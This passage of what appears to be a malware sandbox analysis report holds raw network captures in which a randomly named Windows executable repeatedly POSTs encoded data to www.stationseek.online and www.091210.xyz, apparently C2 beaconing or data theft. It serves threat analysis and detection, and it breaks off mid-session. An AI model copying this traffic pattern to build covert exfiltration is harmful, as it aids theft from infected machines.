                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              18192.168.2.450025198.251.84.200803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:11:46.430624962 CET748OUTPOST /wd23/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.stationseek.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.stationseek.online
                                                                                                                                                                              Referer: http://www.stationseek.online/wd23/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 73 54 42 64 39 66 57 74 71 61 51 44 31 58 44 45 31 73 33 67 79 55 46 54 69 4a 50 6a 38 42 4c 6f 79 42 47 51 7a 46 63 7a 6c 41 74 5a 51 4c 4a 32 6a 6e 64 51 76 48 31 62 45 4b 6d 43 37 46 39 31 32 62 48 7a 75 2f 43 70 78 71 67 33 75 4a 58 68 41 6e 34 58 4a 59 54 67 6e 68 2b 4d 5a 71 41 45 65 6d 53 67 35 74 44 57 41 2b 75 4a 4a 45 5a 45 43 58 59 33 51 77 6b 31 38 44 6d 68 4b 46 6d 68 48 67 36 61 6b 41 48 78 69 48 76 35 75 59 4b 76 4f 74 4e 43 6a 39 44 45 69 33 4d 4c 38 5a 49 42 4f 70 32 31 57 72 50 47 65 36 6e 48 78 36 41 69 5a 4b 51 52 51 49 6d 69 2f 69 49 51 4a 64 59 36 45 78 65 2f 43 2b 54 2f 30 50 46 42 31 54 51 32 4c 64 4e 2b 42 48 77 3d
                                                                                                                                                                              Data Ascii: ZT=sTBd9fWtqaQD1XDE1s3gyUFTiJPj8BLoyBGQzFczlAtZQLJ2jndQvH1bEKmC7F912bHzu/Cpxqg3uJXhAn4XJYTgnh+MZqAEemSg5tDWA+uJJEZECXY3Qwk18DmhKFmhHg6akAHxiHv5uYKvOtNCj9DEi3ML8ZIBOp21WrPGe6nHx6AiZKQRQImi/iIQJdY6Exe/C+T/0PFB1TQ2LdN+BHw=
                                                                                                                                                                              Oct 30, 2024 08:11:47.336349010 CET908INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 707
                                                                                                                                                                              date: Wed, 30 Oct 2024 07:11:47 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              location: http://www.stationseek.online/wd23
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              19192.168.2.450026198.251.84.200803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:11:48.974736929 CET10830OUTPOST /wd23/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.stationseek.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.stationseek.online
                                                                                                                                                                              Referer: http://www.stationseek.online/wd23/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 73 54 42 64 39 66 57 74 71 61 51 44 31 58 44 45 31 73 33 67 79 55 46 54 69 4a 50 6a 38 42 4c 6f 79 42 47 51 7a 46 63 7a 6c 44 4e 5a 51 34 52 32 78 30 46 51 75 48 31 62 4b 71 6d 44 37 46 39 6b 32 62 66 76 75 2f 65 54 78 6f 6f 33 76 76 44 68 49 31 51 58 53 49 54 67 6f 42 2b 59 64 71 42 45 65 6d 44 70 35 74 54 57 41 2b 75 4a 4a 47 42 45 4c 6d 59 33 57 77 6b 32 39 44 6d 39 4f 46 6d 46 48 6a 4c 74 6b 44 72 4c 69 30 33 35 72 4a 6d 76 4d 62 78 43 72 39 44 47 6e 33 4d 54 38 5a 45 4f 4f 70 72 4f 57 71 36 6a 65 39 58 48 78 37 31 31 49 37 30 61 48 4f 79 50 73 68 51 37 43 2f 5a 33 49 51 69 49 4b 4e 48 6e 73 38 6f 6f 37 79 70 66 63 75 52 4b 44 53 69 33 49 5a 4d 32 4c 31 58 46 55 46 35 71 64 50 64 6c 36 54 56 71 54 57 76 45 44 4c 6d 61 74 75 67 7a 77 36 53 77 4c 48 6a 59 6c 64 4d 67 5a 2f 47 6d 42 77 30 36 62 30 77 35 77 6a 77 4c 33 72 62 62 6a 72 35 53 45 42 4c 50 50 56 4a 65 6d 4f 44 51 58 47 42 66 4f 58 75 66 64 50 55 37 6e 6b 62 6f 76 33 76 4f 43 37 72 47 39 78 33 46 35 4a 62 47 76 78 56 65 55 45 7a [TRUNCATED]
                                                                                                                                                                              Data Ascii: ZT=sTBd9fWtqaQD1XDE1s3gyUFTiJPj8BLoyBGQzFczlDNZQ4R2x0FQuH1bKqmD7F9k2bfvu/eTxoo3vvDhI1QXSITgoB+YdqBEemDp5tTWA+uJJGBELmY3Wwk29Dm9OFmFHjLtkDrLi035rJmvMbxCr9DGn3MT8ZEOOprOWq6je9XHx711I70aHOyPshQ7C/Z3IQiIKNHns8oo7ypfcuRKDSi3IZM2L1XFUF5qdPdl6TVqTWvEDLmatugzw6SwLHjYldMgZ/GmBw06b0w5wjwL3rbbjr5SEBLPPVJemODQXGBfOXufdPU7nkbov3vOC7rG9x3F5JbGvxVeUEzh5q15z+eSg3U1c1dJFBxmd2ipstTg0lY/dXfuMJlXyysvDHP/KGRm3Bk7FtnXIx4r0c2mtfHtmYB+tNIrGop+tPue5wittUUCrmedR63unmIgPTnMfsYDLDIrd0XiMPVaOHC5gAa3nP/hxPXjsAlWutu4CMRxcO/siuKjJSwLsUfi4QXt+ZKJp/Ia5j5GtF6DbUoy406nZR5x+SoKtkaNnkasnAYln/TdBoHvDETPm5/ODnmsABNeN34ydsS79a5ZGlfnDjIyaZGHv/kdCLXw/0F5eP2FhNKHq29NGaxXwwsq2qhAjK71eCryy1Nk3zS8BVDzUz5yVaPsa19cuHibfig1ilI5z1YtCg50JkYuQvC9RlbH2WdvGwtZZv1SFEyhCZkEaJjfCJdIuhT0os/Ff9DmSms/dOmyGX1LiNS8aSi5ukpLrXMSv4MF9LcEUa8Uwa0j4rbT8QSm7mEYtLPVjn5ZNCNz02ehVKbBPeFCNg+7h+Hl+dhKiFm/wd6LAMGML0k9Lg0vMV4Lm8vITiwIkNajDK03O80MohLMy0QJaMJD2rWa4g+OqfhgSYU8NohaGeI7npEKHyvvyOtdZPYpVip8d27YD/snhqlHCurriTRW4a9wNv3WdEndtAkJNxEcOC8sjWIJk77qtdhR16bnZVrDtgeEwG7bC [TRUNCATED]
                                                                                                                                                                              Oct 30, 2024 08:11:49.870584965 CET908INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 707
                                                                                                                                                                              date: Wed, 30 Oct 2024 07:11:49 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              location: http://www.stationseek.online/wd23
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              20192.168.2.450027198.251.84.200803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:11:51.522372961 CET451OUTGET /wd23/?ZT=hRp9+v2en7tRz1flyqG17kFmttLc1zOskyKd0ztIjTxyYqd810hmijNQE9yj6BxK05vUksKTuuJXofOYLi9PR6uwuESMYbomdUS7hY3ZEsqPIlhTOHkKZSQ=&mTkD=Gj2Ti2T0g4 HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.stationseek.online
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 30, 2024 08:11:52.442900896 CET1048INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 707
                                                                                                                                                                              date: Wed, 30 Oct 2024 07:11:52 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              location: http://www.stationseek.online/wd23?ZT=hRp9+v2en7tRz1flyqG17kFmttLc1zOskyKd0ztIjTxyYqd810hmijNQE9yj6BxK05vUksKTuuJXofOYLi9PR6uwuESMYbomdUS7hY3ZEsqPIlhTOHkKZSQ=&mTkD=Gj2Ti2T0g4
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              21192.168.2.450028172.67.154.67803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:11:57.656569958 CET704OUTPOST /jwed/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.091210.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.091210.xyz
                                                                                                                                                                              Referer: http://www.091210.xyz/jwed/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 4d 4e 57 78 6b 48 2f 76 74 6a 7a 62 62 71 79 78 33 30 5a 6a 72 2b 71 4e 5a 70 30 41 78 65 66 35 39 56 68 2f 48 35 49 38 79 6e 49 49 79 50 5a 4c 38 37 79 65 6d 46 46 53 44 6c 55 59 6e 6c 4e 77 6f 52 50 69 57 2b 72 75 73 71 68 44 2b 52 68 67 55 38 76 64 58 62 2f 6b 35 4e 6c 48 41 51 76 52 44 52 47 48 63 43 47 49 67 64 51 66 75 34 45 66 6c 54 74 52 62 30 4f 47 6e 48 49 68 75 76 70 6e 33 4f 76 30 63 42 2b 49 32 39 79 57 4d 37 63 69 62 59 44 53 61 49 42 48 37 6d 68 62 4e 57 70 47 67 4d 6c 52 44 48 43 39 43 50 2f 51 44 53 32 43 64 4a 48 32 69 54 49 51 48 30 7a 48 2f 71 48 62 4c 41 3d 3d
                                                                                                                                                                              Data Ascii: ZT=MNWxkH/vtjzbbqyx30Zjr+qNZp0Axef59Vh/H5I8ynIIyPZL87yemFFSDlUYnlNwoRPiW+rusqhD+RhgU8vdXb/k5NlHAQvRDRGHcCGIgdQfu4EflTtRb0OGnHIhuvpn3Ov0cB+I29yWM7cibYDSaIBH7mhbNWpGgMlRDHC9CP/QDS2CdJH2iTIQH0zH/qHbLA==
                                                                                                                                                                              Oct 30, 2024 08:11:58.332462072 CET1027INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:11:58 GMT
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b5ZvPtRhUlbgd6ONKMjWbXaoAqljdmaPMTRB2s%2Fbi6WcDYYUN3nlC4cIdH4rcemOlzry82ceMTb6WE5krFVDHX6rp3XZhsByGm5EY7rJjdi59eMOQ8%2BSwMXmFDkScXu9uA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8da998248a306b05-DFW
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=958&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=704&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Raw: 64 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 4e d5 03 48 ab 95 a0 49 45 a5 50 22 70 0f 3d 1a bc 95 2b b5 71 b0 5d 42 f9 7a 94 54 48 5c 67 de 8c 66 e8 a6 7a 59 9a 5d 5b c3 93 79 6e a0 dd 3e 36 eb 25 cc 6e 11 d7 b5 59 21 56 a6 ba 3a f3 42 23 d6 9b 19 2b f2 f9 74 64 f2 62 1d 2b ca 87 7c 14 5e e8 05 6c 42 86 55 38 77 8e f0 2a 2a c2 09 a2 f7 e0 2e 63 ae e4 7f 8c 2f 59 51 cf c6 0b 44 f9 3c 4b ca e2 60 fb da c0 60 13 74 21 c3 7e e4 20 74 90 fd 21 41 92 f8 25 b1 20 ec c7 a6 c8 8a ac 73 51 52 e2 87 de 7e 78 81 b7 09 00 9b 61 18 86 42 df 97 f3 52 17 df 97 1f 68 43 cc 70 a7 09 ff 02 8a 70 5a 44 38 3d f9 05 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 04 f8 69 a3 04 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: d6LN0DwNHIEP"p=+q]BzTH\gfzY][yn>6%nY!V:B#+tdb+|^lBU8w**.c/YQD<K``t!~ t!A% sQR~xaBRhCppZD8=bi0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              22192.168.2.450029172.67.154.67803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:12:00.197139025 CET724OUTPOST /jwed/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.091210.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.091210.xyz
                                                                                                                                                                              Referer: http://www.091210.xyz/jwed/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 4d 4e 57 78 6b 48 2f 76 74 6a 7a 62 61 4c 43 78 32 58 78 6a 6a 2b 71 4f 63 70 30 41 37 2b 65 2b 39 56 39 2f 48 37 6b 53 79 56 73 49 79 74 42 4c 36 4b 79 65 6c 46 46 53 49 46 55 58 70 46 4e 42 6f 52 53 66 57 2b 58 75 73 71 6c 44 2b 55 64 67 55 50 58 65 58 4c 2f 71 69 64 6c 5a 4e 77 76 52 44 52 47 48 63 44 6a 56 67 64 49 66 75 49 30 66 6b 33 35 65 56 55 4f 48 75 6e 49 68 71 76 70 37 33 4f 76 47 63 41 6a 74 32 2b 4b 57 4d 36 4d 69 62 4b 37 52 54 49 42 46 6b 57 67 4d 4e 33 78 4e 6c 4f 55 6e 4f 52 75 71 4e 75 71 39 50 30 37 59 4d 34 6d 68 77 54 73 6a 61 7a 36 7a 79 70 36 53 51 47 6b 41 50 73 61 43 4b 6b 72 56 42 68 4f 32 75 35 39 67 62 68 38 3d
                                                                                                                                                                              Data Ascii: ZT=MNWxkH/vtjzbaLCx2Xxjj+qOcp0A7+e+9V9/H7kSyVsIytBL6KyelFFSIFUXpFNBoRSfW+XusqlD+UdgUPXeXL/qidlZNwvRDRGHcDjVgdIfuI0fk35eVUOHunIhqvp73OvGcAjt2+KWM6MibK7RTIBFkWgMN3xNlOUnORuqNuq9P07YM4mhwTsjaz6zyp6SQGkAPsaCKkrVBhO2u59gbh8=
                                                                                                                                                                              Oct 30, 2024 08:12:00.880208015 CET1025INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:12:00 GMT
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a5aMnOrTDMLSCD9d3MNs5NP5MCIfiHRg%2FMrugTcVU3tK8Dxn28uRBzqqmnq4v9gRwb8qMCygHf%2BrOriebiqqnMTUbsJ9CD4YYQLhaxYhdUaSBSqIizJPZWpRg%2BmT7JTsgw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8da9983488fc4689-DFW
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1075&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=724&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Raw: 64 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 4e d5 03 48 ab 95 a0 49 45 a5 50 22 70 0f 3d 1a bc 95 2b b5 71 b0 5d 42 f9 7a 94 54 48 5c 67 de 8c 66 e8 a6 7a 59 9a 5d 5b c3 93 79 6e a0 dd 3e 36 eb 25 cc 6e 11 d7 b5 59 21 56 a6 ba 3a f3 42 23 d6 9b 19 2b f2 f9 74 64 f2 62 1d 2b ca 87 7c 14 5e e8 05 6c 42 86 55 38 77 8e f0 2a 2a c2 09 a2 f7 e0 2e 63 ae e4 7f 8c 2f 59 51 cf c6 0b 44 f9 3c 4b ca e2 60 fb da c0 60 13 74 21 c3 7e e4 20 74 90 fd 21 41 92 f8 25 b1 20 ec c7 a6 c8 8a ac 73 51 52 e2 87 de 7e 78 81 b7 09 00 9b 61 18 86 42 df 97 f3 52 17 df 97 1f 68 43 cc 70 a7 09 ff 02 8a 70 5a 44 38 3d f9 05 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 04 f8 69 a3 04 01 00 00 0d 0a
                                                                                                                                                                              Data Ascii: d6LN0DwNHIEP"p=+q]BzTH\gfzY][yn>6%nY!V:B#+tdb+|^lBU8w**.c/YQD<K``t!~ t!A% sQR~xaBRhCppZD8=bi
                                                                                                                                                                              Oct 30, 2024 08:12:00.880224943 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              23192.168.2.450030172.67.154.67803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:12:02.763341904 CET10806OUTPOST /jwed/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.091210.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.091210.xyz
                                                                                                                                                                              Referer: http://www.091210.xyz/jwed/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
